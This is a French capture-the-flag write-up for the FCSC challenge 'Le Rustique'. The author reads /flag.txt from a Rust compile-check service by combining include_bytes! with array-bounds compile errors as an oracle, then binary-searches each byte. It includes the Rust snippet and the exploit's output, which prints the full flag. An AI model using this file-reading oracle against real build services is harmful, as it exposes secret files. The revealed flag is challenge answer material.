# Le Rustique (18 points)

**Challenge**

On vous demande d'auditer cette solution de vérification syntaxique en Rust.

Lien : http://challenges2.france-cybersecurity-challenge.fr:6005/

**Solution**

On jette un coup d'oeil à l'applcation en question :

![Le Rustique 1](le_rustique1.png)

Il s'agit donc d'une interface simple permettant de saisir du code Rust et de vérifier s'il compile à l'aide d'un bouton. Un message s'affiche alors en fonction du résultat, dans donner aucune information sur les erreurs potentielles rencontrées, mais uniquement si la compilation s'est bien passée ou non.

Ce point est confirmé par la FAQ :

![Le Rustique 2](le_rustique2.png)

Cette FAQ nous donne d'autres informations. D'une part que le code est inséré dans une fonction main avant compilation. La version du compilateur (ça tombe bien, c'est celle installée sur mon Ubuntu au moment du challenge). Et surtout, elle indique la présence d'un fichier /flag.txt sur le serveur. On sait maintenant ce que l'on vise.

L'objectif donc est de lire le contenu du fichier /flag.txt, en fournissant du code Rust qui sera compilé, mais non exécuté, et dont on aura aucune autre information si ce n'est que le code compile. La bonne nouvelle, c'est que c'est du Rust...

On se plonge dans la doc de Rust pour voir ce qui pourrait nous servir, et on arrive rapidement sur une macro qui pourrait nous aider. En effet, [include_bytes](https://doc.rust-lang.org/std/macro.include_bytes.html) permet la lecture d'un fichier **à la compilation**. On sait donc comment lire le fichier.

Maintenant se pose la question d'obtenir son contenu, alors qu'on ne fait que compiler le code et que l'on n'a pas les éventuels messages d'erreur. C'est ici que Rust va nous aider. En effet : 
>> Rust’s rich type system and ownership model guarantee memory-safety and thread-safety — enabling you to eliminate many classes of bugs at **compile-time**.

En particulier, le compilateur va strictement vérifier les accès dans les tableaux, et refusera de compiler du code qui tenterait d'accéder à un index dépassant la taille d'un tableau. Nous allons tourner ce comportement à notre avantage : en déclarant un tableau d'une certaine taille, et en tentant d'accéder à un index dont la valeur correspond à un octet du fichier flag.txt, on peut déterminer si la valeur en question est inférieure à la taille du tableau (compilation ok) ou non (compilation en erreur).

Faisons l'essai pour confirmer. On tente de compiler le code suivant :
```rust
 // Lit le premier caractère
const PLOP: u8 = include_bytes!("/flag.txt")[0];
// Tableau de 60 octets
const ARRAY: [u8; 60] = [0; 60];
// Accès à l'index du premier caractère
let i = ARRAY[PLOP as usize];
```

![Le Rustique 3](le_rustique3.png)

Tentons maintenant d'agrandir le tableau à 100 octets :

![Le Rustique 4](le_rustique4.png)

Parfait ! Il ne nous reste plus qu'à automatiser le tout à l'aide d'un script python. Afin d'être un peu efficace, on va une recherche dichotomique, caractère par caractère. L'exploit est disponible [ici](le_rustique.py), et son résultat est le suivant:
```
F
FC
FCS
FCSC
FCSC{
FCSC{a
FCSC{a3
FCSC{a35
FCSC{a350
FCSC{a3503
FCSC{a35036
FCSC{a350364
FCSC{a3503648
FCSC{a35036487
FCSC{a350364874
FCSC{a3503648743
FCSC{a35036487430
FCSC{a35036487430b
FCSC{a35036487430b2
FCSC{a35036487430b24
FCSC{a35036487430b24d
FCSC{a35036487430b24da
FCSC{a35036487430b24da3
FCSC{a35036487430b24da38
FCSC{a35036487430b24da38b
FCSC{a35036487430b24da38b4
FCSC{a35036487430b24da38b43
FCSC{a35036487430b24da38b43e
FCSC{a35036487430b24da38b43e1
FCSC{a35036487430b24da38b43e13
FCSC{a35036487430b24da38b43e136
FCSC{a35036487430b24da38b43e1369
FCSC{a35036487430b24da38b43e1369f
FCSC{a35036487430b24da38b43e1369f5
FCSC{a35036487430b24da38b43e1369f56
FCSC{a35036487430b24da38b43e1369f56e
FCSC{a35036487430b24da38b43e1369f56e6
FCSC{a35036487430b24da38b43e1369f56e69
FCSC{a35036487430b24da38b43e1369f56e69a
FCSC{a35036487430b24da38b43e1369f56e69a2
FCSC{a35036487430b24da38b43e1369f56e69a25
FCSC{a35036487430b24da38b43e1369f56e69a25b
FCSC{a35036487430b24da38b43e1369f56e69a25bd
FCSC{a35036487430b24da38b43e1369f56e69a25bd3
FCSC{a35036487430b24da38b43e1369f56e69a25bd39
FCSC{a35036487430b24da38b43e1369f56e69a25bd39e
FCSC{a35036487430b24da38b43e1369f56e69a25bd39e5
FCSC{a35036487430b24da38b43e1369f56e69a25bd39e59
FCSC{a35036487430b24da38b43e1369f56e69a25bd39e594
FCSC{a35036487430b24da38b43e1369f56e69a25bd39e594c
FCSC{a35036487430b24da38b43e1369f56e69a25bd39e594cd
FCSC{a35036487430b24da38b43e1369f56e69a25bd39e594cd1
FCSC{a35036487430b24da38b43e1369f56e69a25bd39e594cd1e
FCSC{a35036487430b24da38b43e1369f56e69a25bd39e594cd1e7
FCSC{a35036487430b24da38b43e1369f56e69a25bd39e594cd1e7f
FCSC{a35036487430b24da38b43e1369f56e69a25bd39e594cd1e7ff
FCSC{a35036487430b24da38b43e1369f56e69a25bd39e594cd1e7ff3
FCSC{a35036487430b24da38b43e1369f56e69a25bd39e594cd1e7ff3e
FCSC{a35036487430b24da38b43e1369f56e69a25bd39e594cd1e7ff3e9
FCSC{a35036487430b24da38b43e1369f56e69a25bd39e594cd1e7ff3e97
FCSC{a35036487430b24da38b43e1369f56e69a25bd39e594cd1e7ff3e97b
FCSC{a35036487430b24da38b43e1369f56e69a25bd39e594cd1e7ff3e97b6
FCSC{a35036487430b24da38b43e1369f56e69a25bd39e594cd1e7ff3e97b62
FCSC{a35036487430b24da38b43e1369f56e69a25bd39e594cd1e7ff3e97b62b
FCSC{a35036487430b24da38b43e1369f56e69a25bd39e594cd1e7ff3e97b62b3
FCSC{a35036487430b24da38b43e1369f56e69a25bd39e594cd1e7ff3e97b62b3c
FCSC{a35036487430b24da38b43e1369f56e69a25bd39e594cd1e7ff3e97b62b3c6
FCSC{a35036487430b24da38b43e1369f56e69a25bd39e594cd1e7ff3e97b62b3c63
FCSC{a35036487430b24da38b43e1369f56e69a25bd39e594cd1e7ff3e97b62b3c638
FCSC{a35036487430b24da38b43e1369f56e69a25bd39e594cd1e7ff3e97b62b3c638}
```